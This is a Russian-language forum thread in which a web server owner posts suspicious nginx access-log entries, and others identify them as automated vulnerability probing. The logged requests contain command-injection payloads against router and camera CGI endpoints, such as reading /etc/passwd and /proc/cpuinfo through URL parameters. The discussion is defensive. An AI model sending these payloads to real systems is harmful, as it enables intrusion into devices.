forum.opennet.ru - "Непонятные записи в /var/log/nginx/access.log" (3)

форумы

правила/FAQ

поиск

регистрация

вход/выход

слежка

"Непонятные записи в /var/log/nginx/access.log"

Форум Информационная безопасность (Обнаружение и предотвращение атак / Linux)
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"Непонятные записи в /var/log/nginx/access.log"	+/–
Сообщение от Romanson (ok) on 26-Окт-17, 02:49
Приветствую! Вот эти записи: 220.72.145.24 - - [25/Oct/2017:19:18:18 +0300] "GET / HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:18 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "POST /command.php HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "GET /system.ini?loginuse&loginpas HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;echo+nuuo+123456;%27 HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:21 +0300] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:21 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:22 +0300] "POST /hedwig.cgi HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:22 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "POST /apply.cgi HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20AAA** BBB\|\|\|%20%3b&ping_size=&ping_times=5&traceroute_ip=\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/¤tsetting.htm=1&cmd=echo+dgn+123456 HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account. HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1" 301 186 "-" "-" "-" 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" После этих записей нагрузка CPU стала быстро расти до 100% и сайт висит! Что это такое?
Ответить \| Правка \| Cообщить модератору

Оглавление

Непонятные записи в /var/log/nginx/access.log, Одъминъ, 17:45 , 26-Окт-17, (1)
Непонятные записи в /var/log/nginx/access.log, ыы, 21:15 , 26-Окт-17, (2)
Непонятные записи в /var/log/nginx/access.log, Pahanivo, 17:59 , 27-Окт-17, (3)

Сообщения по теме [Сортировка по времени | RSS]

1. "Непонятные записи в /var/log/nginx/access.log" +/–

Сообщение от Одъминъ on 26-Окт-17, 17:45

>[оверквотинг удален]
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> После этих записей нагрузка CPU стала быстро расти до 100% и сайт
> висит!
> Что это такое?
Разведка или попытка взлома.
Смотри, есть ли у тебя файлы, перечисленные в запросах, доступны ли они снаружи.
Особенно интересный запрос:
GET /board.cgi?cmd=cat /etc/passwd, проверь, не появился ли новый пользак с правами рута или wheel.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Непонятные записи в /var/log/nginx/access.log" +/–

Сообщение от ыы on 26-Окт-17, 21:15

>[оверквотинг удален]
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> После этих записей нагрузка CPU стала быстро расти до 100% и сайт
> висит!
> Что это такое?
это http 301

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Непонятные записи в /var/log/nginx/access.log" +/–

Сообщение от Pahanivo (ok) on 27-Окт-17, 17:59

боты нюхают дыры ...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Непонятные записи в /var/log/nginx/access.log"	+/–
Сообщение от Одъминъ on 26-Окт-17, 17:45
>[оверквотинг удален] > 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* > HTTP/1.1" 301 186 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo > HTTP/1.1" 301 186 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" > После этих записей нагрузка CPU стала быстро расти до 100% и сайт > висит! > Что это такое? Разведка или попытка взлома. Смотри, есть ли у тебя файлы, перечисленные в запросах, доступны ли они снаружи. Особенно интересный запрос: GET /board.cgi?cmd=cat /etc/passwd, проверь, не появился ли новый пользак с правами рута или wheel.
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

2. "Непонятные записи в /var/log/nginx/access.log"	+/–
Сообщение от ыы on 26-Окт-17, 21:15
>[оверквотинг удален] > 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* > HTTP/1.1" 301 186 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo > HTTP/1.1" 301 186 "-" "-" "-" > 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-" > После этих записей нагрузка CPU стала быстро расти до 100% и сайт > висит! > Что это такое? это http 301
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

3. "Непонятные записи в /var/log/nginx/access.log"	+/–
Сообщение от Pahanivo (ok) on 27-Окт-17, 17:59
боты нюхают дыры ...
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору